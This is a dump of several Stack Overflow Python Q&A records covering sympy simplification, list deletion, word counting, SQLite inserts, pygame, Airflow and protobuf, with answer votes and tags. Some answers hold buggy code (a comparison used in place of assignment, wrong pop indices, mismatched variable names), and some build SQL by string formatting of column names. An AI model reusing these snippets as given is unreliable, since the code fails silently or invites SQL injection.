⎝2⋅ζ - 2 2⋅ζ - 2 2⋅ζ - 2 ωₙ⋅⎝2⋅ζ - 2⎠ ⎠ \n\nNow we see there are various powers that could be simplified by combining them. In general sqrt(z-1)*sqrt(z+1) is not necessarily equal to sqrt(z**2 - 1) but the assumption that z is positive means that they are equal. In that case powsimp should combine those powers:\nIn [46]: res.rhs.collect(wn).powsimp()\nOut[46]: \n ⎛ ________ ________⎞ \n ⎛ _______ _______⎞ ⎜ 2 ╱ 2 ╱ 2 ⎟ ⎛ _______ _______⎞\n⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠ ⎜ x₀⋅ζ x₀⋅ζ⋅╲╱ ζ - 1 x₀ v₀⋅╲╱ ζ - 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⋅╲╱ ζ + 1 ⎠\n⎜- ───────────── + ── - ────────────────⎟⋅ℯ + ⎜──────── + ──────────────── - ──────── + ──────────────⎟⋅ℯ \n⎜ ________ 2 ________⎟ ⎜ 2 2 2 ⎛ 2 ⎞ ⎟ \n⎜ ╱ 2 ╱ 2 ⎟ ⎝2⋅ζ - 2 2⋅ζ - 2 2⋅ζ - 2 ωₙ⋅⎝2⋅ζ - 2⎠ ⎠ \n⎝ 2⋅╲╱ ζ - 1 2⋅ωₙ⋅╲╱ ζ - 1 ⎠ \n\nHere powsimp didn't apply to the exponents so we need to use deep=True to tell it to look deeper for things to combine:\nIn [47]: res.rhs.collect(wn).powsimp(deep=True)\nOut[47]: \n ⎛ ________⎞ ⎛ ________ ________⎞ ⎛ ________⎞\n ⎜ ╱ 2 ⎟ ⎜ 2 ╱ 2 ╱ 2 ⎟ ⎜ ╱ 2 ⎟\n⎛ x₀⋅ζ x₀ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜ x₀⋅ζ x₀⋅ζ⋅╲╱ ζ - 1 x₀ v₀⋅╲╱ ζ - 1 ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠\n⎜- ───────────── + ── - ────────────────⎟⋅ℯ + ⎜──────── + ──────────────── - ──────── + ──────────────⎟⋅ℯ \n⎜ ________ 2 ________⎟ ⎜ 2 2 2 ⎛ 2 ⎞ ⎟ \n⎜ ╱ 2 ╱ 2 ⎟ ⎝2⋅ζ - 2 2⋅ζ - 2 2⋅ζ - 2 ωₙ⋅⎝2⋅ζ - 2⎠ ⎠ \n⎝ 2⋅╲╱ ζ - 1 2⋅ωₙ⋅╲╱ ζ - 1 ⎠ \n\nThere are common factors like 2 that we can extract with factor_terms:\nIn [48]: factor_terms(res.rhs.collect(wn).powsimp(deep=True))\nOut[48]: \n ⎛ ________⎞ ⎛ ________⎞\n ⎜ ╱ 2 ⎟ ⎛ 2 ⎞ ⎜ ╱ 2 ⎟\n⎛ x₀⋅ζ v₀ ⎞ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜x₀⋅ζ x₀⋅ζ x₀ v₀ ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠\n⎜- ─────────── + x₀ - ──────────────⎟⋅ℯ + ⎜────── + ─────────── - ────── + ──────────────⎟⋅ℯ \n⎜ ________ ________⎟ ⎜ 2 ________ 2 ________⎟ \n⎜ ╱ 2 ╱ 2 ⎟ ⎜ζ - 1 ╱ 2 ζ - 1 ╱ 2 ⎟ \n⎝ ╲╱ ζ - 1 ωₙ⋅╲╱ ζ - 1 ⎠ ⎝ ╲╱ ζ - 1 ωₙ⋅╲╱ ζ - 1 ⎠ \n──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\n 2 \n\nNow we can collect on powers of z**2 - 1 to reduce the repeating subexpressions:\nIn [55]: factor_terms(res.rhs.collect(wn).powsimp(deep=True)).collect(z**2 - 1)\nOut[55]: \n⎛ v₀⎞ ⎛ ________⎞ ⎛ v₀ ⎞ ⎛ ________⎞\n⎜ -x₀⋅ζ - ──⎟ ⎜ ╱ 2 ⎟ ⎜ 2 x₀⋅ζ + ── ⎟ ⎜ ╱ 2 ⎟\n⎜ ωₙ⎟ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜x₀⋅ζ - x₀ ωₙ ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠\n⎜x₀ + ───────────⎟⋅ℯ ⎜────────── + ───────────⎟⋅ℯ \n⎜ ________⎟ ⎜ 2 ________⎟ \n⎜ ╱ 2 ⎟ ⎜ ζ - 1 ╱ 2 ⎟ \n⎝ ╲╱ ζ - 1 ⎠ ⎝ ╲╱ ζ - 1 ⎠ \n─────────────────────────────────────────── + ───────────────────────────────────────────────────\n 2 2 \n\nFinally applying factor_terms to the coefficients of that last collect allows us to cancel the one remaining awkward term and normalise the minus signs:\nIn [56]: factor_terms(res.rhs.collect(wn).powsimp(deep=True)).collect(z**2 - 1, factor_terms)\nOut[56]: \n⎛ v₀ ⎞ ⎛ ________⎞ ⎛ v₀ ⎞ ⎛ ________⎞\n⎜ x₀⋅ζ + ── ⎟ ⎜ ╱ 2 ⎟ ⎜ x₀⋅ζ + ── ⎟ ⎜ ╱ 2 ⎟\n⎜ ωₙ ⎟ -ωₙ⋅t⋅⎝ζ + ╲╱ ζ - 1 ⎠ ⎜ ωₙ ⎟ ωₙ⋅t⋅⎝-ζ + ╲╱ ζ - 1 ⎠\n⎜x₀ - ───────────⎟⋅ℯ ⎜x₀ + ───────────⎟⋅ℯ \n⎜ ________⎟ ⎜ ________⎟ \n⎜ ╱ 2 ⎟ ⎜ ╱ 2 ⎟ \n⎝ ╲╱ ζ - 1 ⎠ ⎝ ╲╱ ζ - 1 ⎠ \n─────────────────────────────────────────── + ───────────────────────────────────────────\n 2 2\n\n" ]
[ 3, 1 ]
[]
[]
[ "expression", "python", "sympy" ]
stackoverflow_0074574539_expression_python_sympy.txt
Q: Deleting multiple elements in a list - with a list of item locations I have two lists. List1 is the list of items I am trying to format List2 is a list of item locations in List1 that I need to remove (condensing duplicates) The issue seems to be that it first removes the first location (9) and then removes the second (16) after...instead of doing them simultaneously. After it removes 9, the list is changed and 16 is removed in a different intended location because of that. List1 = ["HST", "BA", "CRM", "QQQ", "IYR", "TDG", "HD", "TDY", "UAL", "CRM", "XOM", "CCL", "LLY", "QCOM", "UPS", "MPW", "CCL", "ILMN", "MU", "GOOGL", "AXP", "IVZ", "WY"] List2 = [9, 16] print(List1) print(List2) for x in List2: List1.pop(x) print(List1) A: You can sort List2 and reverse it afterward (sorted(List2, key=List2.index, reverse=True)). Then python will remove these elements from back to the front: List1 = ["HST", "BA", "CRM", "QQQ", "IYR", "TDG", "HD", "TDY", "UAL", "CRM", "XOM", "CCL", "LLY", "QCOM", "UPS", "MPW", "CCL", "ILMN", "MU", "GOOGL", "AXP", "IVZ", "WY"] List2 = [9, 16] List2 = sorted(List2, key=List2.index, reverse=True) for x in List2: List1.pop(x) print(List1) A: try with something like that List1 = ["HST", "BA", "CRM", "QQQ", "IYR", "TDG", "HD", "TDY", "UAL", "CRM", "XOM", "CCL", "LLY", "QCOM", "UPS", "MPW", "CCL", "ILMN", "MU", "GOOGL", "AXP", "IVZ", "WY"] List2 = [9, 16] print(List1) print(List2) for i, x in enumerate(List2): List1.pop(x-i) print(List1) A: Use: S = set(List2) out = [x for i, x in enumerate(List1) if i not in S] A: You can use enumerate to keep count of how many items you have removed and find their new location on the list. If you remove one item, the index of the next item to be removed is -1. for i, j in enumerate(list2): list1.pop(i - j) the enumerate return a tuple with the value of the list and a count of the loop.
Deleting multiple elements in a list - with a list of item locations
I have two lists. List1 is the list of items I am trying to format List2 is a list of item locations in List1 that I need to remove (condensing duplicates) The issue seems to be that it first removes the first location (9) and then removes the second (16) after...instead of doing them simultaneously. After it removes 9, the list is changed and 16 is removed in a different intended location because of that. List1 = ["HST", "BA", "CRM", "QQQ", "IYR", "TDG", "HD", "TDY", "UAL", "CRM", "XOM", "CCL", "LLY", "QCOM", "UPS", "MPW", "CCL", "ILMN", "MU", "GOOGL", "AXP", "IVZ", "WY"] List2 = [9, 16] print(List1) print(List2) for x in List2: List1.pop(x) print(List1)
[ "You can sort List2 and reverse it afterward (sorted(List2, key=List2.index, reverse=True)). Then python will remove these elements from back to the front:\nList1 = [\"HST\", \"BA\", \"CRM\", \"QQQ\", \"IYR\", \"TDG\", \"HD\", \"TDY\", \"UAL\", \"CRM\", \"XOM\", \"CCL\", \"LLY\", \"QCOM\", \"UPS\", \"MPW\", \"CCL\", \"ILMN\", \"MU\", \"GOOGL\", \"AXP\", \"IVZ\", \"WY\"]\nList2 = [9, 16]\n\nList2 = sorted(List2, key=List2.index, reverse=True)\nfor x in List2:\n List1.pop(x)\n\nprint(List1)\n\n\n", "try with something like that\nList1 = [\"HST\", \"BA\", \"CRM\", \"QQQ\", \"IYR\", \"TDG\", \"HD\", \"TDY\", \"UAL\", \"CRM\", \"XOM\", \"CCL\", \"LLY\", \"QCOM\", \"UPS\", \"MPW\", \"CCL\", \"ILMN\", \"MU\", \"GOOGL\", \"AXP\", \"IVZ\", \"WY\"]\nList2 = [9, 16]\n\nprint(List1)\nprint(List2)\n\n\nfor i, x in enumerate(List2):\n List1.pop(x-i)\n\nprint(List1)\n\n", "Use:\nS = set(List2)\n\nout = [x for i, x in enumerate(List1) if i not in S]\n\n", "You can use enumerate to keep count of how many items you have removed and find their new location on the list.\nIf you remove one item, the index of the next item to be removed is -1.\nfor i, j in enumerate(list2):\n list1.pop(i - j)\n\nthe enumerate return a tuple with the value of the list and a count of the loop.\n" ]
[ 1, 0, 0, 0 ]
[]
[]
[ "numpy", "python", "python_3.x" ]
stackoverflow_0074575522_numpy_python_python_3.x.txt
Q: How to print multiple words in my program? I have this program that reads a file and prints the desired amount of most common words. I don't know how to print the words that appear the same amount of times. Here's my code: number_of_words = int(input('Enter how many top words you want to see: ')) uniques = [] stop_words = ["a", "an", "and", "in", "is"] for word in words: check_special = False if word.isalnum(): check_special = True if word not in uniques and word not in stop_words and check_special: uniques.append(word) counts = [] for unique in uniques: count = 0 for word in words: if word == unique: count += 1 counts.append((count, unique)) counts.sort() counts.reverse() for i in range(min(number_of_words, len(counts))): count, word = counts[i] print('The following words appeared %d each: %s ' % (count, word)) As a demo it prints: The following words appeared 11 each: night The following words appeared 11 each: go I want the output to be: The following words appeared 11 each: go, night How can I achieve this? A: We can achieve by using this. count_with_word = {} for i in range(min(number_of_words, len(counts))): count, word = counts[i] if count in count_with_word: count_with_word[count].append(word) else: count_with_word[count] = [word] for count, words in count_with_word.items(): print('The following words appeared %d each: %s ' % (count, ', '.join(words))) Output would be like: The following words appeared 2 each: t1, t2 A: Use dict counts_dict = {count: [] for count, word in counts} for count, word in counts: counts_dict[count].append(word) count_num_word = 0 for count in counts_dict: if count_num_word >= number_of_words: break print('The following words appeared %d each: %s ' % (count, ', '.join(counts_dict[count]))) count_num_word += len(counts_dict[count]) e.g. words = ['B', 'B', 'A', 'A', 'C'] > Enter how many top words you want to see: 3 > The following words appeared 2 each: B, A > The following words appeared 1 each: C > Enter how many top words you want to see: 2 > The following words appeared 2 each: B, A > Enter how many top words you want to see: 1 > The following words appeared 2 each: B, A Although you input number_of_words as 1, it should return all words that share the same count, as shown in the example.
How to print multiple words in my program?
I have this program that reads a file and prints the desired amount of most common words. I don't know how to print the words that appear the same amount of times. Here's my code: number_of_words = int(input('Enter how many top words you want to see: ')) uniques = [] stop_words = ["a", "an", "and", "in", "is"] for word in words: check_special = False if word.isalnum(): check_special = True if word not in uniques and word not in stop_words and check_special: uniques.append(word) counts = [] for unique in uniques: count = 0 for word in words: if word == unique: count += 1 counts.append((count, unique)) counts.sort() counts.reverse() for i in range(min(number_of_words, len(counts))): count, word = counts[i] print('The following words appeared %d each: %s ' % (count, word)) As a demo it prints: The following words appeared 11 each: night The following words appeared 11 each: go I want the output to be: The following words appeared 11 each: go, night How can I achieve this?
[ "We can achieve by using this.\ncount_with_word = {}\nfor i in range(min(number_of_words, len(counts))):\n count, word = counts[i]\n if count in count_with_word:\n count_with_word[count].append(word)\n else:\n count_with_word[count] = [word]\n\nfor count, words in count_with_word.items():\n print('The following words appeared %d each: %s ' % (count, ', '.join(words)))\n\nOutput would be like:\nThe following words appeared 2 each: t1, t2\n", "Use dict\ncounts_dict = {count: [] for count, word in counts}\nfor count, word in counts:\n counts_dict[count].append(word)\n\ncount_num_word = 0\nfor count in counts_dict:\n if count_num_word >= number_of_words:\n break\n print('The following words appeared %d each: %s ' % (count, ', '.join(counts_dict[count])))\n count_num_word += len(counts_dict[count])\n\ne.g.\nwords = ['B', 'B', 'A', 'A', 'C']\n\n> Enter how many top words you want to see: 3\n> The following words appeared 2 each: B, A \n> The following words appeared 1 each: C \n\n> Enter how many top words you want to see: 2\n> The following words appeared 2 each: B, A \n\n> Enter how many top words you want to see: 1\n> The following words appeared 2 each: B, A \n\nAlthough you input number_of_words as 1, it should return all words that share the same count, as shown in the example.\n" ]
[ 1, 0 ]
[]
[]
[ "python", "python_3.x" ]
stackoverflow_0074575523_python_python_3.x.txt
Q: Python Sqlite3 insert operation with a list of column names Normally, if i want to insert values into a table, i will do something like this (assuming that i know which columns that the values i want to insert belong to): conn = sqlite3.connect('mydatabase.db') conn.execute("INSERT INTO MYTABLE (ID,COLUMN1,COLUMN2)\ VALUES(?,?,?)",[myid,value1,value2]) But now i have a list of columns (the length of list may vary) and a list of values for each columns in the list. For example, if i have a table with 10 columns (Namely, column1, column2...,column10 etc). I have a list of columns that i want to update.Let's say [column3,column4]. And i have a list of values for those columns. [value for column3,value for column4]. How do i insert the values in the list to the individual columns that each belong? A: As far as I know the parameter list in conn.execute works only for values, so we have to use string formatting like this: import sqlite3 conn = sqlite3.connect(':memory:') conn.execute('CREATE TABLE t (a integer, b integer, c integer)') col_names = ['a', 'b', 'c'] values = [0, 1, 2] conn.execute('INSERT INTO t (%s, %s, %s) values(?,?,?)'%tuple(col_names), values) Please notice this is a very bad attempt since strings passed to the database shall always be checked for injection attack. However you could pass the list of column names to some injection function before insertion. EDITED: For variables with various length you could try something like exec_text = 'INSERT INTO t (' + ','.join(col_names) +') values(' + ','.join(['?'] * len(values)) + ')' conn.exec(exec_text, values) # as long as len(col_names) == len(values) A: Of course string formatting will work, you just need to be a bit cleverer about it. col_names = ','.join(col_list) col_spaces = ','.join(['?'] * len(col_list)) sql = 'INSERT INTO t (%s) values(%s)' % (col_list, col_spaces) conn.execute(sql, values) A: I was looking for a solution to create columns based on a list of unknown / variable length and found this question. However, I managed to find a nicer solution (for me anyway), that's also a bit more modern, so thought I'd include it in case it helps someone: import sqlite3 def create_sql_db(my_list): file = 'my_sql.db' table_name = 'table_1' init_col = 'id' col_type = 'TEXT' conn = sqlite3.connect(file) c = conn.cursor() # CREATE TABLE (IF IT DOESN'T ALREADY EXIST) c.execute('CREATE TABLE IF NOT EXISTS {tn} ({nf} {ft})'.format( tn=table_name, nf=init_col, ft=col_type)) # CREATE A COLUMN FOR EACH ITEM IN THE LIST for new_column in my_list: c.execute('ALTER TABLE {tn} ADD COLUMN "{cn}" {ct}'.format( tn=table_name, cn=new_column, ct=col_type)) conn.close() my_list = ["Col1", "Col2", "Col3"] create_sql_db(my_list) All my data is of the type text, so I just have a single variable "col_type" - but you could for example feed in a list of tuples (or a tuple of tuples, if that's what you're into): my_other_list = [("ColA", "TEXT"), ("ColB", "INTEGER"), ("ColC", "BLOB")] and change the CREATE A COLUMN step to: for tupl in my_other_list: new_column = tupl[0] # "ColA", "ColB", "ColC" col_type = tupl[1] # "TEXT", "INTEGER", "BLOB" c.execute('ALTER TABLE {tn} ADD COLUMN "{cn}" {ct}'.format( tn=table_name, cn=new_column, ct=col_type)) A: As a noob, I can't comment on the very succinct, updated solution @ron_g offered. While testing, though I had to frequently delete the sample database itself, so for any other noobs using this to test, I would advise adding in: c.execute('DROP TABLE IF EXISTS {tn}'.format( tn=table_name)) Prior the the 'CREATE TABLE ...' portion. It appears there are multiple instances of .format( tn=table_name ....) in both 'CREATE TABLE ...' and 'ALTER TABLE ...' so trying to figure out if it's possible to create a single instance (similar to, or including in, the def section).
Python Sqlite3 insert operation with a list of column names
Normally, if i want to insert values into a table, i will do something like this (assuming that i know which columns that the values i want to insert belong to): conn = sqlite3.connect('mydatabase.db') conn.execute("INSERT INTO MYTABLE (ID,COLUMN1,COLUMN2)\ VALUES(?,?,?)",[myid,value1,value2]) But now i have a list of columns (the length of list may vary) and a list of values for each columns in the list. For example, if i have a table with 10 columns (Namely, column1, column2...,column10 etc). I have a list of columns that i want to update.Let's say [column3,column4]. And i have a list of values for those columns. [value for column3,value for column4]. How do i insert the values in the list to the individual columns that each belong?
[ "As far as I know the parameter list in conn.execute works only for values, so we have to use string formatting like this:\nimport sqlite3\nconn = sqlite3.connect(':memory:')\nconn.execute('CREATE TABLE t (a integer, b integer, c integer)')\ncol_names = ['a', 'b', 'c']\nvalues = [0, 1, 2]\nconn.execute('INSERT INTO t (%s, %s, %s) values(?,?,?)'%tuple(col_names), values)\n\nPlease notice this is a very bad attempt since strings passed to the database shall always be checked for injection attack. However you could pass the list of column names to some injection function before insertion.\nEDITED:\nFor variables with various length you could try something like \nexec_text = 'INSERT INTO t (' + ','.join(col_names) +') values(' + ','.join(['?'] * len(values)) + ')'\nconn.exec(exec_text, values)\n# as long as len(col_names) == len(values)\n\n", "Of course string formatting will work, you just need to be a bit cleverer about it.\ncol_names = ','.join(col_list)\ncol_spaces = ','.join(['?'] * len(col_list))\nsql = 'INSERT INTO t (%s) values(%s)' % (col_list, col_spaces)\nconn.execute(sql, values)\n\n", "I was looking for a solution to create columns based on a list of unknown / variable length and found this question. However, I managed to find a nicer solution (for me anyway), that's also a bit more modern, so thought I'd include it in case it helps someone:\nimport sqlite3\n\ndef create_sql_db(my_list):\n\n file = 'my_sql.db'\n table_name = 'table_1'\n init_col = 'id'\n col_type = 'TEXT'\n\n conn = sqlite3.connect(file)\n c = conn.cursor()\n\n # CREATE TABLE (IF IT DOESN'T ALREADY EXIST)\n c.execute('CREATE TABLE IF NOT EXISTS {tn} ({nf} {ft})'.format(\n tn=table_name, nf=init_col, ft=col_type))\n\n # CREATE A COLUMN FOR EACH ITEM IN THE LIST\n for new_column in my_list:\n c.execute('ALTER TABLE {tn} ADD COLUMN \"{cn}\" {ct}'.format(\n tn=table_name, cn=new_column, ct=col_type))\n\n conn.close()\n\n\nmy_list = [\"Col1\", \"Col2\", \"Col3\"]\n\ncreate_sql_db(my_list)\n\nAll my data is of the type text, so I just have a single variable \"col_type\" - but you could for example feed in a list of tuples (or a tuple of tuples, if that's what you're into):\nmy_other_list = [(\"ColA\", \"TEXT\"), (\"ColB\", \"INTEGER\"), (\"ColC\", \"BLOB\")]\n\nand change the CREATE A COLUMN step to:\nfor tupl in my_other_list:\n\n new_column = tupl[0] # \"ColA\", \"ColB\", \"ColC\"\n col_type = tupl[1] # \"TEXT\", \"INTEGER\", \"BLOB\"\n\n c.execute('ALTER TABLE {tn} ADD COLUMN \"{cn}\" {ct}'.format(\n tn=table_name, cn=new_column, ct=col_type))\n\n", "As a noob, I can't comment on the very succinct, updated solution @ron_g offered. While testing, though I had to frequently delete the sample database itself, so for any other noobs using this to test, I would advise adding in:\n c.execute('DROP TABLE IF EXISTS {tn}'.format(\n tn=table_name))\n\nPrior the the 'CREATE TABLE ...' portion.\nIt appears there are multiple instances of\n.format(\n tn=table_name ....)\n\nin both 'CREATE TABLE ...' and 'ALTER TABLE ...' so trying to figure out if it's possible to create a single instance (similar to, or including in, the def section).\n" ]
[ 4, 3, 1, 0 ]
[]
[]
[ "python", "python_2.7", "sqlite" ]
stackoverflow_0020044178_python_python_2.7_sqlite.txt
Q: I have a problem with my "Game of life" on python I don't know why but my "def" that checks 3 rules of "Game of live" doesn't work correctly. I have 2 lists that contains 0 and some 1 to check the program. 3 points that should give this image but instead it gives this def upd(mass,screen,WHITE,mass1): BLACK = (0,0,0) for i in range(len(mass)-1): for j in range(len(mass[i])-1): if mass[i][j] == 0: if near(mass,i,j) == True: mass1[i][j]=1 print("case1") if mass[i][j] == 1: if (near(mass,i,j)==False): mass1[i][j]=0 print("case 2") if (near(mass,i,j)==False): mass1[i][j]=0 print("case 3") for i in range(len(mass1)-1): for j in range(len(mass1[i])-1): if mass1[i][j] == 1: p.draw.rect(screen, (WHITE), Rect((j*10,i*10), (10,10))) else: p.draw.rect(screen, (BLACK), Rect((j*10,i*10), (10,10))) mass=mass1 def near(mass,i,j): counter = 0 if mass[i][j+1]==1: counter+=1 if mass[i][j-1]==1: counter+=1 if mass[i+1][j]==1: counter+=1 if mass[i-1][j]==1: counter+=1 if mass[i+1][j+1]==1: counter+=1 if mass[i-1][j+1]==1: counter+=1 if mass[i+1][j-1]==1: counter+=1 if mass[i-1][j-1] == 1: counter+=1 if counter<2 or counter == 0: return False if counter > 3: return False if counter == 3: return True log that repeats every circle I am not good in python so I think this code is quite scarry:) I'll be very grateful for any advice A: mass = mass1 does not copy the contents of the grid, it just puts a reference to mass1 in mass (actually only in the local variable mass in scope of upd). You must deep copy the grid: for i in range(len(mass1)): for j in range(len(mass1[i])): mass[i][j] == mass1[i][j]
I have a problem with my "Game of life" on python
I don't know why but my "def" that checks 3 rules of "Game of live" doesn't work correctly. I have 2 lists that contains 0 and some 1 to check the program. 3 points that should give this image but instead it gives this def upd(mass,screen,WHITE,mass1): BLACK = (0,0,0) for i in range(len(mass)-1): for j in range(len(mass[i])-1): if mass[i][j] == 0: if near(mass,i,j) == True: mass1[i][j]=1 print("case1") if mass[i][j] == 1: if (near(mass,i,j)==False): mass1[i][j]=0 print("case 2") if (near(mass,i,j)==False): mass1[i][j]=0 print("case 3") for i in range(len(mass1)-1): for j in range(len(mass1[i])-1): if mass1[i][j] == 1: p.draw.rect(screen, (WHITE), Rect((j*10,i*10), (10,10))) else: p.draw.rect(screen, (BLACK), Rect((j*10,i*10), (10,10))) mass=mass1 def near(mass,i,j): counter = 0 if mass[i][j+1]==1: counter+=1 if mass[i][j-1]==1: counter+=1 if mass[i+1][j]==1: counter+=1 if mass[i-1][j]==1: counter+=1 if mass[i+1][j+1]==1: counter+=1 if mass[i-1][j+1]==1: counter+=1 if mass[i+1][j-1]==1: counter+=1 if mass[i-1][j-1] == 1: counter+=1 if counter<2 or counter == 0: return False if counter > 3: return False if counter == 3: return True log that repeats every circle I am not good in python so I think this code is quite scarry:) I'll be very grateful for any advice
[ "mass = mass1 does not copy the contents of the grid, it just puts a reference to mass1 in mass (actually only in the local variable mass in scope of upd). You must deep copy the grid:\nfor i in range(len(mass1)):\n for j in range(len(mass1[i])):\n mass[i][j] == mass1[i][j]\n\n" ]
[ 0 ]
[]
[]
[ "pygame", "python" ]
stackoverflow_0074575332_pygame_python.txt
Q: Airflow Subdag started but tasks within it not starting I have a situation and problem in my production airflow. Here it goes : There’s a dag with multiple subdags. when I trigger the dag, sub-dag got triggered and shows as in progress but the tasks inside it are not getting started. shows as blank for long time. When I try to render the pod spec, this error shows : Error rendering Kubernetes Pod Spec: Parent instance <TaskInstance at 0x7faaa5f48d60> is not bound to a Session; lazy load operation of attribute ‘dag_model’ cannot proceed (Background on this error at: http://sqlalche.me/e/13/bhk3) Apache Airflow : 2.2.3 python 3.x A: Yeah, sometimes this happens to me too. Maybe it is an Airflow bug, I don't know. What I do instead is force the Subdag to trigger manually: After I do this once, the next DAG execution will run as expected. Edit: After some research, I found out this DAG parameter might be related is_paused_upon_creation, once it is set to false it should start the Subdag if this is the first time it ever runs. Look at the docs for more info
Airflow Subdag started but tasks within it not starting
I have a situation and problem in my production airflow. Here it goes : There’s a dag with multiple subdags. when I trigger the dag, sub-dag got triggered and shows as in progress but the tasks inside it are not getting started. shows as blank for long time. When I try to render the pod spec, this error shows : Error rendering Kubernetes Pod Spec: Parent instance <TaskInstance at 0x7faaa5f48d60> is not bound to a Session; lazy load operation of attribute ‘dag_model’ cannot proceed (Background on this error at: http://sqlalche.me/e/13/bhk3) Apache Airflow : 2.2.3 python 3.x
[ "Yeah, sometimes this happens to me too. Maybe it is an Airflow bug, I don't know.\nWhat I do instead is force the Subdag to trigger manually:\n\nAfter I do this once, the next DAG execution will run as expected.\nEdit:\nAfter some research, I found out this DAG parameter might be related is_paused_upon_creation, once it is set to false it should start the Subdag if this is the first time it ever runs.\nLook at the docs for more info\n" ]
[ 0 ]
[]
[]
[ "airflow", "python" ]
stackoverflow_0073354932_airflow_python.txt
Q: protocol buffers in python: no classes generated My proto file is as follows: syntax = "proto3"; option csharp_namespace = "Proto"; message FileListRequest { repeated File Files = 1; } message File { string Path = 1; } message ImageFile { File File = 1; Size Size = 2; bytes Content = 3; } message Size { int32 Width = 1; int32 Height = 2; } message SendNextFile { } I compile it with the following command: protoc --proto_path=. -I . --python_out=..\..\python\Modules\PreloadingIteratorWrapper\ .\filelist.proto This creates the following file: # -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: filelist.proto """Generated protocol buffer code.""" from google.protobuf.internal import builder as _builder from google.protobuf import descriptor as _descriptor from google.protobuf import descriptor_pool as _descriptor_pool from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x0e\x66ilelist.proto\"\'\n\x0f\x46ileListRequest\x12\x14\n\x05\x46iles\x18\x01 \x03(\x0b\x32\x05.File\"\x14\n\x04\x46ile\x12\x0c\n\x04Path\x18\x01 \x01(\t\"F\n\tImageFile\x12\x13\n\x04\x46ile\x18\x01 \x01(\x0b\x32\x05.File\x12\x13\n\x04Size\x18\x02 \x01(\x0b\x32\x05.Size\x12\x0f\n\x07\x43ontent\x18\x03 \x01(\x0c\"%\n\x04Size\x12\r\n\x05Width\x18\x01 \x01(\x05\x12\x0e\n\x06Height\x18\x02 \x01(\x05\"\x0e\n\x0cSendNextFileB\x08\xaa\x02\x05Protob\x06proto3') _builder.BuildMessageAndEnumDescriptors(DESCRIPTOR, globals()) _builder.BuildTopDescriptorsAndMessages(DESCRIPTOR, 'filelist_pb2', globals()) if _descriptor._USE_C_DESCRIPTORS == False: DESCRIPTOR._options = None DESCRIPTOR._serialized_options = b'\252\002\005Proto' _FILELISTREQUEST._serialized_start=18 _FILELISTREQUEST._serialized_end=57 _FILE._serialized_start=59 _FILE._serialized_end=79 _IMAGEFILE._serialized_start=81 _IMAGEFILE._serialized_end=151 _SIZE._serialized_start=153 _SIZE._serialized_end=190 _SENDNEXTFILE._serialized_start=192 _SENDNEXTFILE._serialized_end=206 # @@protoc_insertion_point(module_scope) According to the documentation this file should contain a class for each message type, but it doesn't. Why? A: Documentation says: Unlike when you generate Java and C++ protocol buffer code, the Python protocol buffer compiler doesn't generate your data access code for you directly. It means, that your .proto files won't be converted into some familiar accessors (no classes, no methods and no properties defined) Then, in docs, you see this: Instead (as you'll see if you look at addressbook_pb2.py) it generates special descriptors for all your messages, enums, and fields, and some mysteriously empty classes, one for each message type Which means: You'll see descriptors, parsed from serialized .proto file You'll see variables, named exactly the same as in .proto file But these "variables" are nothing but GeneratedProtocolMessageType class, which is a metaclass, but for protocol messages Then, you should look into docs for GeneratedProtocolMessageType from package google.protobuf.internal.python_message, where you should see this line: Metaclass for protocol message classes created at runtime from Descriptors. And this line means that you won't see any expected properties or methods while you code. Because these variables will become metaclasses for your protocol messages only at runtime! These metaclasses, at the time you look at the lines with their instantiation, are factories for your protocol messages Moreover, this behavior is mentioned in the middle of the docs for that class: The protocol compiler currently uses this metaclass to create protocol message classes at runtime. It works only that way: We add implementations for all methods described in the Message class. We also create properties to allow getting/setting all fields in the protocol message. Finally, we create slots to prevent users from accidentally "setting" nonexistent fields in the protocol message, which then wouldn't get serialized / deserialized properly. This metaclass generates classes for your protocol messages, described in .proto files, using descriptors from generated files. Only at runtime (not at coding time) And only at runtime you'll be able to use them as factories for your classes (those, which you expect to see in code) and, also, as a types for method parameters So there is nothing wrong with Google Protobuf Documentation, it is not outdated A: I have the same issue. Experimenting with grpc-tools (I found answer in another thread suggesting usage of this tool) I finally found a solution. Just add to protoc command this arg: --pyi_out like: protoc --proto_path=. -I . --python_out=..\..\python\Modules\PreloadingIteratorWrapper\ --pyi_out=python_out=..\..\python\Modules\PreloadingIteratorWrapper\ .\filelist.proto It will generate for you _bp2.py as well as corresponding _bp2.pyi (stub file). After that your IDE will see the class names, intellisense will work etc.
protocol buffers in python: no classes generated
My proto file is as follows: syntax = "proto3"; option csharp_namespace = "Proto"; message FileListRequest { repeated File Files = 1; } message File { string Path = 1; } message ImageFile { File File = 1; Size Size = 2; bytes Content = 3; } message Size { int32 Width = 1; int32 Height = 2; } message SendNextFile { } I compile it with the following command: protoc --proto_path=. -I . --python_out=..\..\python\Modules\PreloadingIteratorWrapper\ .\filelist.proto This creates the following file: # -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: filelist.proto """Generated protocol buffer code.""" from google.protobuf.internal import builder as _builder from google.protobuf import descriptor as _descriptor from google.protobuf import descriptor_pool as _descriptor_pool from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x0e\x66ilelist.proto\"\'\n\x0f\x46ileListRequest\x12\x14\n\x05\x46iles\x18\x01 \x03(\x0b\x32\x05.File\"\x14\n\x04\x46ile\x12\x0c\n\x04Path\x18\x01 \x01(\t\"F\n\tImageFile\x12\x13\n\x04\x46ile\x18\x01 